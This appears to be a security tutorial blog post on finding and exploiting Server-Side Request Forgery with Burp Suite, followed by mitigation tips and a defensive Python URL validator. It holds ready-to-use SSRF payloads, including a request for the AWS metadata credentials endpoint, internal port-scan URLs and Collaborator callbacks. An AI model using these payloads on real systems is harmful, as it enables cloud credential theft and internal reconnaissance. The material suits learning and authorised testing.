Exploiting SSRF Like a Pro: Real-World Attacks Using Burp Suite


Introduction to SSRF

Server-Side Request Forgery (SSRF) is a vulnerability that allows an attacker to make the server-side application send HTTP requests to an unintended location. This is especially dangerous because it can:

  • Interact with internal systems not directly accessible externally (e.g., 169.254.169.254 on AWS)

  • Scan internal networks

  • Access metadata endpoints

  • Chain with other vulnerabilities (e.g., RCE, privilege escalation)


Setting Up Burp Suite for SSRF Testing

  1. Configure Target Scope: Limit active scanning to target applications only.

  2. Set Up Intercept Proxy: Ensure Burp is intercepting browser traffic.

  3. Enable Burp Collaborator: Used to detect blind SSRF.


Detecting SSRF Vulnerabilities

1. Basic SSRF Test

Try injecting URLs into parameters that accept them:


POST /api/load_image HTTP/1.1
Host: victim.com
Content-Type: application/x-www-form-urlencoded

url=http://127.0.0.1:80/


Check the response for:

  • Time delays

  • Reflected internal IPs

  • Connection reset or refused

2. Burp Collaborator Payloads

Inject Collaborator URLs:


url=http://<your-collaborator-id>.burpcollaborator.net


Then monitor for DNS and HTTP interactions in the Burp Collaborator client.


Real-World SSRF Exploitation Examples

1. AWS Metadata Service

Target URL: http://169.254.169.254/latest/meta-data/

Payload:


url=http://169.254.169.254/latest/meta-data/iam/security-credentials/


Result: if the request succeeds, the response returns temporary AWS credentials.


2. Internal Port Scanning

Payloads:


url=http://127.0.0.1:22/
url=http://10.0.0.1:8080/


Burp Repeater and Intruder can be used to automate IP/port scanning.


3. Blind SSRF with Burp Collaborator

Inject:


url=http://<your-id>.burpcollaborator.net


If there is no direct response but Collaborator logs a DNS/HTTP interaction, that confirms blind SSRF.


4. SSRF to RCE Chain

  • SSRF -> Redis/Consul/internal service

  • SSRF is used to manipulate internal configuration (e.g., changing webhook endpoints)

  • This in turn leads to Remote Code Execution (RCE)

Burp's Logger++ extension helps monitor internal traffic behavior.


Automation & Extensions

  • Authorize: Detect SSRF in AuthZ mechanisms

  • SSRFMap: Python tool to automate SSRF attacks

  • Collaborator Everywhere: Automatically adds Collaborator payloads to all parameters


Mitigation Tips

From a developer’s perspective:

  • Whitelist (allowlist) the external hosts the application is permitted to fetch from

  • Disallow following redirects when fetching user-supplied URLs

  • Validate and sanitize all URL inputs

  • Use IMDSv2 (the session-token-based metadata service) on AWS, and the equivalent hardening on other cloud providers
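As an added illustration of these tips (not code from the original post), a Python validator for user-supplied URLs that applies a host allowlist, rejects any hostname resolving to a non-public address (loopback, RFC 1918, link-local including 169.254.169.254), and refuses to follow redirects. The hostnames and IPs are constructed, and the resolver is injectable so the check can be exercised offline.

```python
import ipaddress
import socket
import urllib.error
import urllib.request
from urllib.parse import urlparse

# Hosts this application is permitted to fetch from (constructed example values).
ALLOWED_HOSTS = {"images.example.com", "cdn.example.com"}

def _is_public(ip: str) -> bool:
    """Globally routable unicast only: rejects loopback, RFC 1918, link-local
    (including 169.254.169.254, the cloud metadata endpoint) and multicast."""
    addr = ipaddress.ip_address(ip.split("%")[0])  # drop an IPv6 zone id if present
    return addr.is_global and not addr.is_multicast

def validate_outbound_url(url: str, resolver=socket.getaddrinfo) -> tuple[bool, str]:
    """Return (ok, reason). The resolver is injectable so the check can run offline."""
    parts = urlparse(url)
    if parts.scheme not in ("http", "https"):
        return False, f"scheme not allowed: {parts.scheme!r}"
    host = parts.hostname
    if not host or "@" in parts.netloc:  # reject userinfo tricks such as http://allowed@evil/
        return False, "missing host or userinfo present"
    if host not in ALLOWED_HOSTS:
        return False, f"host not in allowlist: {host}"
    try:
        port = parts.port or (443 if parts.scheme == "https" else 80)
        infos = resolver(host, port, proto=socket.IPPROTO_TCP)
    except (ValueError, socket.gaierror) as exc:
        return False, f"invalid port or resolution failed: {exc}"
    # Every resolved address must be public; a name pointing at an internal IP is refused.
    bad = sorted({info[4][0] for info in infos if not _is_public(info[4][0])})
    if bad:
        return False, f"host resolves to non-public address(es): {bad}"
    return True, "ok"

class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Refuse redirects: a 3xx to an internal address would bypass the check above."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        raise urllib.error.HTTPError(req.full_url, code, "redirects are not followed", headers, fp)

def fetch(url: str) -> bytes:
    """Fetch only after validation, with redirects disabled and a short timeout."""
    ok, reason = validate_outbound_url(url)
    if not ok:
        raise ValueError(f"refusing outbound request: {reason}")
    opener = urllib.request.build_opener(_NoRedirect)
    with opener.open(url, timeout=5) as resp:
        return resp.read()
```

The check resolves the name at validation time; a service that must defend against DNS rebinding should additionally connect to the resolved address it checked rather than re-resolving at fetch time.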


Conclusion

SSRF is a powerful attack vector that can lead to internal reconnaissance, sensitive data exposure, or even full compromise. Using Burp Suite, researchers can craft advanced payloads, monitor responses, and detect blind SSRF using Collaborator.

